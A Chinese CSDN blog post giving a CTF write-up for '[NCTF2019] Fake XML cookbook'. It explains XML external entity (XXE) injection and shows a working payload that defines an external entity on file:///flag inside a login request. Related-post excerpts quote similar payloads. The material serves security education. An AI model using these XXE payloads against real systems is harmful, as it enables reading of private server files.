[NCTF2019]Fake XML cookbook 1

最新推荐文章于 2024-01-30 21:53:52 发布
最新推荐文章于 2024-01-30 21:53:52 发布
阅读量615 收藏 3
点赞数
文章标签: xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/125107864
版权

[NCTF2019]Fake XML cookbook 1

首先得到题目:

在这里插入图片描述

尝试弱口令和sql注入

发现没有结果

抓个包发现:

在这里插入图片描述

并且题目也提示了XML

这里的X-Requested-With提示了XML

然后发送到了doLogin.php

这里先讲一下XML的相关知识

XXE的危害和SSRF的有点像

XXE=>XML外部实体注入(被各种后端脚本调用)

XML=>像html,html的目的是显示数据,但是xml的目的是传输数据,他没有预定义,他是纯文本,他是不会做任何事情的。可以自己定义标签。说到底他就是一个储存数据传输数据的东西

外部实体=>

注入=>用户输入的数据被当做代码执行

典型的XXE攻击是由

XML声明:<?xml version="1.0"?>

DTD部分(通过特殊的命令去其他文件读取信息)

SYSTEM

XML部分组成

危害:

XXE 可以通过dtd去读取,访问其他文件或者网站,类似于ssrf

<!DOCTFPE scan [<!ENTITY test SYSTEM "file:///c:/1.txt">]>   DTD部分 
<scan>&test;</scan>  XML部分

scan标签设置一个test的实体,这个实体是通过system命令访问1.txt

构造payload

<?xml version="1.0" encoding="utf-8"?>//XML声明
   
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>

<user><username>&admin;</username><password>123456</password></user>

得到flag:

在这里插入图片描述
参考博客:

https://blog.csdn.net/weixin_44214568/article/details/123873595

南冥~
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
[NCTF2019]Fake XML cookbook1
whale_waves的博客
12-11 732
xml注入其实和sql注入类似,利用了xml的解析机制如果系统没有将‘’进行转义,那么攻击者就可以修改或者添加xml信息 例如: 这里是正常的注册的xml 用户输入 假如我添加一个呢,这样是否就将我们输入的用户名变成了权限 用户输入
[NCTF2019]Fake XML cookbook(特详解)
热门推荐
qq_74806534的博客
01-30 2万+
攻击者可以通过构造恶意的 XML 文档将其发送到应用程序中,在解析该文档时,XML 解析器会加载外部实体(如文件、URL等),以便在文档中引用它们。PHP 默认使用 libxml 来解析 XML,但是从 libxml 2.9.0 开始,它默认不再解析外部实体,导致 PHP 下的 XXE 漏洞已经逐渐消失,除非你指定 LIBLXML_NOENT 去开启外部实体解析,才会存在 XXE 漏洞。4.在成功回调函数中,根据返回的 XML 数据解析出登录结果的代码和消息,然后根据不同的结果更新页面上的提示信息。
web buuctf [NCTF2019]Fake XML cookbook1
weixin_44214568的博客
03-31 674
考点:XXE(XML External Entity Injection 即XML外部实体注入) 1.界面 随便填入信息,进行抓包 2.分析请求头, 有x-requests-with,可以知道请求是ajax请求(ajax 全名asyncjavascript and XML(异步JavaScript和XML))也就是通过xml进行数据传输 https://xz.aliyun.com/t/6887#toc-0 抓包更改xml <?xml version="1.0" encoding..
XXE漏洞与CTF题目
m0_62725813的博客
12-09 192
典型的XXE攻击是由XML声明:<?DTD部分(通过特殊的命令去其他文件读取信息)SYSTEMXML部分组成危害:XXE 可以通过dtd去读取,访问其他文件或者网站,类似于ssrf">]> DTD部分</scan> XML部分scan标签设置一个test的实体,这个实体是通过system命令访问1.txt构造payload>//XML声明">]>
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛历年题——从第一届到第十四届
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
NCTF2019 Fake XML cookbook
Tajang的大千世界
02-09 164
发现使用XML存储username和password。将内容发送至Repeater,然后写入恶意实体,注意这里是使用file://协议读取flag文件,并且将这个文件赋给admin。后面的admin前有&的意思是读取admin。所以这里会读取flag文件。蒙了几个username和password都显示错误,看来没有太多提示了。既然题目提示了XML那就百度一波。已知晓XML存在实体注入,引入实体文件,然后读取它就完成注入了。得出flag,感觉挺顺利的,第一次遇见xml实体注入,或者叫XXE攻击。
BUUCTF:[NCTF2019]Fake XML cookbook
qq_46230755的博客
12-18 502
说在前面 这题的考点是XXE攻击 https://xz.aliyun.com/t/6887 这里很详细讲了什么是XXE 打开来后的页面是这样的,我们试着用admin和123456进行输入,然后抓个包 里面存在一个XML实体,我们可以构造恶意实体,读取flag <!DOCTYPE ANY [ <!ENTITY test SYSTEM "file:///flag"> ]> <user><username>&test;</username.
第四十四题——[NCTF2019]Fake XML cookbook
分享简单的安全技术
04-27 223
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,发现页面是一个登录框,通过题目的XML提示,是使用XML注入漏洞 第二步:随便输入账号密码,使用burpsuite抓包,发现XML数据 第三步:使用XML引用外部实体读取文件 构建XML语句,由于是读取文档,所以使用note <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY XXE SYSTEM "fil
[NCTF2019]Fake XML cookbook
qq_44749590的博客
06-08 224
[NCTF2019]Fake XML cookbook
BUUCTF Fake XML cookbook
wwwwyyyrre的博客
04-08 211
打开题目发现有账号密码登录 先尝试万能密码 但是发现不行 回到题目有xml 去搜索一下发现xml有注入漏洞XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。XXE原理。
xml-xxe漏洞之Fake XML cookbook
qq_58970968的博客
07-21 263
有的小伙伴可能已经发现了,例1中实体名前面并没有%,而例2中实体名前是有%的,这里的区别在于,例1中定义的实体是通用实体,而例2中定义的是参数实体,并且参数实体只能在dtd中使用,即例2代码中的第三行%d;,这里就像在外面引用统用实体一样,这里的%d;就引用了http//xxx.com/xxe.dtd这个文件到dtd中。当应用是通过用户上传的XML文件或POST请求进行数据的传输,并且应用没有禁止XML引用外部实体,也没有过滤用户提交的XML数据,那么就会产生XML外部实体注入漏洞,即XXE漏洞。...
练[NCTF2019]Fake XML cookbook
m0_66225311的博客
09-28 223
利用XXE漏洞进行文件读取
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值